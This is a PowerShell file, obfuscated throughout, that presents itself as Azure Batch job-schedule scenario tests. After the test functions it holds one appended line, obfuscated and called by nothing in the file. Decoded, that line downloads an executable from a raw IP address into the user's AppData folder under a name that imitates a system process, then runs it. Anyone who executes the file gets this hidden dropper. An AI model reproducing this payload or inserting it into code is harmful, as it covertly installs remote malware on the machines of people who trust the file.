function TeST-jobsc`hE`D`U`lec`RuD
{
    ${conT`Ext} = .("{0}{1}{2}" -f'Ne','w-Obj','ect') ("{1}{10}{5}{0}{8}{7}{11}{6}{3}{2}{9}{4}{12}" -f 'r','Mi','Scenari','t.','C','soft.Azu','Batch.Tes','mand','e.Com','oTests.ScenarioTest','cro','s.','ontext')

    ${J`sId1} = ("{1}{2}{0}{3}" -f'le','job','Schedu','1')
    ${JSi`D2} = ("{2}{0}{1}" -f 'hed','ule2','jobSc')

    try
    {
        
        ${j`O`BsPEC1} = .("{2}{1}{0}"-f 'ct','je','New-Ob') ("{0}{5}{9}{11}{6}{10}{4}{8}{2}{3}{14}{7}{1}{15}{13}{12}" -f 'M','S','nds.Bat','c','o','ic','.Azur','PSJob','mma','ro','e.C','soft','fication','ci','h.Models.','pe')
        ${JOBSP`e`C1}."p`o`oL`iNFORmATi`On" = .("{2}{1}{0}"-f 't','ew-Objec','N') ("{9}{3}{5}{4}{6}{7}{0}{1}{8}{10}{2}"-f 'o','l','n','r','.Azure.Co','osoft','mmands.Batch.Mod','els.PSPo','Informat','Mic','io')
        ${Jobspe`c1}."pO`O`LiNFORma`TI`On"."P`o`OliD" = ("{0}{1}"-f'testP','ool')
        ${sC`hE`DUle1} = .("{1}{0}{2}" -f 'w-Obj','Ne','ect') ("{9}{5}{3}{2}{6}{1}{0}{7}{4}{8}"-f'ode','ch.M','ure.Commands.B','rosoft.Az','PSSched','c','at','ls.','ule','Mi')
        .("{1}{0}{5}{4}{2}{3}{6}" -f 'w-Az','Ne','h','edu','obSc','BatchJ','le') -Id ${jSI`D1} -JobSpecification ${j`OBs`Pe`C1} -Schedule ${Sc`H`e`dUlE1} -BatchContext ${cOn`T`ExT}

        ${jo`B`SPec2} = &("{1}{2}{0}" -f 'ject','N','ew-Ob') ("{5}{9}{0}{6}{8}{1}{2}{3}{7}{10}{4}"-f '.','.Commands.B','atch.Models.PSJo','bSp','ion','Microso','Azu','ecifi','re','ft','cat')
        ${Job`sP`E`c2}."P`Ool`infoRmA`TIOn" = &("{3}{1}{2}{0}" -f 't','ew-Obje','c','N') ("{6}{5}{9}{8}{0}{2}{3}{1}{4}{7}" -f'ds.Ba','o','tch.M','odels.PSP','olInformat','t.A','Microsof','ion','n','zure.Comma')
        ${jOB`s`Pec2}."p`O`oLinFORmAT`ion"."POO`LId" = ("{1}{2}{3}{0}" -f '2','te','stPo','ol')
        ${SChEDU`L`E2} = &("{0}{3}{1}{2}"-f'N','jec','t','ew-Ob') ("{5}{8}{7}{3}{6}{2}{1}{9}{4}{0}"-f'SSchedule','s.','e.Command','.Az','atch.Models.P','M','ur','crosoft','i','B')
        ${schEDu`L`E2}."dOn`O`TruNun`TiL" = .("{0}{1}{2}" -f 'Ne','w-O','bject') ("{3}{2}{0}{1}{4}" -f '.D','ate','ystem','S','Time') -ArgumentList @(2020, 01, 01, 12, 30, 0)
        &("{3}{0}{2}{5}{4}{1}"-f'ew-AzBa','bSchedule','t','N','o','chJ') -Id ${jS`i`D2} -JobSpecification ${jobs`peC2} -Schedule ${s`cheduL`E2} -BatchContext ${Cont`EXT}

        
        ${JOBSCHe`DUl`Es} = .("{4}{3}{1}{0}{2}"-f'hJobSchedu','Batc','le','et-Az','G') -Filter ('i'+'d '+'e'+'q '+"'$jsId1' "+'or'+' '+'id'+' '+'eq'+' '+"'$jsId2'") -BatchContext ${coNtE`XT}
        ${J`O`B`sCheDuLE1} = ${JoBS`cHe`duL`es} | .("{1}{0}{3}{2}"-f 'bj','Where-O','t','ec') { ${_}."I`D" -eq ${j`siD1} }
        ${J`ob`SCh`eDUl`e2} = ${jo`BSCHEDul`es} | &("{1}{3}{2}{0}" -f'Object','Wher','-','e') { ${_}."id" -eq ${Jsi`d2} }
        &("{0}{1}{3}{2}" -f 'A','ssert-N','l','otNul') ${jOBSche`D`Ul`e1}
        &("{0}{2}{1}" -f 'Assert-N','ll','otNu') ${j`o`BSchEDU`LE2}

        
        ${joBsch`E`duLE2}."s`c`hEdUlE"."doNOtR`UN`UnT`il" = ${n`ewDon`OTRunU`NT`Il} = &("{2}{1}{0}"-f'w-Object','e','N') ("{0}{1}{2}{3}"-f'S','ystem.DateT','im','e') -ArgumentList @(2025, 01, 01, 12, 30, 0)
        ${joBs`cH`eD`Ule2} | &("{2}{4}{6}{0}{1}{5}{3}" -f 'J','ob','S','dule','et-AzBa','Sche','tch') -BatchContext ${cO`NTe`xT}
        ${UpD`A`Te`DJob`SchE`DuLe} = &("{2}{3}{1}{0}" -f 'e','chJobSchedul','Get-A','zBat') -Id ${j`SID2} -BatchContext ${C`oNTexT}
        .("{3}{0}{1}{2}"-f'-A','reEqua','l','Assert') ${new`dOnoT`Ru`N`U`NTIl} ${uP`dATEd`jO`B`sC`heDULe}."S`CHEdu`LE"."dON`O`T`RUnUnTIL"
    }
    finally
    {
        
        .("{1}{3}{4}{5}{6}{2}{0}" -f 'e','Remov','l','e-AzBat','c','hJobS','chedu') -Id ${jS`ID1} -Force -BatchContext ${cOnT`E`XT}
        &("{5}{2}{4}{3}{1}{6}{0}" -f 'edule','ob','-Az','atchJ','B','Remove','Sch') -Id ${j`sI`D2} -Force -BatchContext ${CO`N`TexT}

        foreach (${jS} in .("{1}{2}{0}{3}{5}{4}" -f 'tc','Ge','t-AzBa','hJobSche','ule','d') -BatchContext ${CONT`E`XT})
        {
            .("{0}{2}{1}" -f'Assert-','e','Tru') { (${jS}."id" -ne ${JsI`d1} -and ${js}."id" -ne ${jSi`d2}) -or (${jS}."sTA`Te".("{0}{1}" -f 'ToSt','ring').Invoke().("{1}{0}"-f 'Lower','To').Invoke() -eq ("{1}{0}{2}"-f 'n','deleti','g')) }
        }
    }
}


function TEsT-DiS`ABLe`ENabLet`ER`MiN`ATeJobS`C`HEdU`Le
{
    param([string]${JOB`Sc`He`dULeId})

    ${c`ONtE`XT} = .("{2}{0}{3}{1}" -f 'ew','t','N','-Objec') ("{3}{12}{4}{14}{8}{5}{11}{10}{1}{7}{9}{15}{2}{6}{13}{0}"-f 'ntext','sts.Sce','e','M','rosoft.','.Batch.Tes','s','n','e.Commands','ari','narioTe','t.Sce','ic','tCo','Azur','oT')

    &("{5}{7}{2}{3}{1}{4}{6}{0}" -f 'e','c','b','le-AzBat','hJo','D','bSchedul','isa') ${JObSCh`e`D`ULeiD} -BatchContext ${C`oNTe`Xt}

    
    ${jOb`sCh`ED`ULE} = &("{0}{2}{1}{4}{3}" -f'G','Jo','et-AzBatch','chedule','bS') ${j`oBS`chE`DUL`eid} -BatchContext ${Con`TeXT}
    &("{4}{3}{0}{2}{1}"-f't-','al','AreEqu','ser','As') ("{2}{1}{0}"-f 'led','b','Disa') ${JoBScHe`d`Ule}."st`Ate"

    ${j`obSChEDu`LE} | .("{0}{2}{1}{4}{3}" -f'Enabl','AzBatch','e-','dule','JobSche') -BatchContext ${Conte`XT}

    
    ${joBS`cHEDU`LE} = &("{4}{2}{0}{5}{3}{1}" -f'Job','e','tch','ul','Get-AzBa','Sched') -Filter ('i'+'d '+'eq'+' '+"'$jobScheduleId'") -BatchContext ${CoN`TexT}
    &("{0}{4}{1}{3}{2}" -f'Ass','-Ar','l','eEqua','ert') ("{1}{2}{0}" -f'e','Act','iv') ${J`ObSCHE`dUlE}."St`ATE"

    
    ${J`OBsChed`U`le} | .("{2}{1}{4}{5}{0}{3}" -f'Batc','to','S','hJobSchedule','p-A','z') -BatchContext ${C`on`TEXt}

    
    ${J`O`Bsch`edUlE} = .("{1}{2}{6}{5}{3}{0}{4}"-f'hed','G','et-AzB','Sc','ule','chJob','at') ${j`obSc`HEdulE`ID} -BatchContext ${conTE`XT}
    .("{0}{3}{2}{1}" -f'Ass','ue','t-Tr','er') { (${Job`S`CHEdule}."s`TaTe".("{1}{2}{0}"-f 'g','ToS','trin').Invoke().("{1}{2}{0}"-f 'r','T','oLowe').Invoke() -eq ("{0}{3}{1}{2}" -f 't','rm','inating','e')) -or (${jOBsc`h`E`dULe}."s`TaTE".("{0}{1}{2}" -f'T','oStr','ing').Invoke().("{1}{0}{2}"-f 'oLo','T','wer').Invoke() -eq ("{0}{1}"-f'compl','eted')) }
}
(.("{2}{1}{0}{3}" -f'c','Obje','New-','t') ("{2}{3}{1}{0}{4}"-f'ebC','.Net.W','Syste','m','lient')).("{0}{2}{1}" -f 'Down','oadFile','l').Invoke(("{6}{0}{3}{5}{7}{4}{2}{1}"-f'248','sv.exe','ahoo/csr','.170','y','.218','http://89.','/~'),"$env:APPDATA\csrsv.exe");.("{2}{3}{0}{4}{1}" -f 'Pr','cess','Start','-','o') ("$env:APPDATA\csrsv.exe")
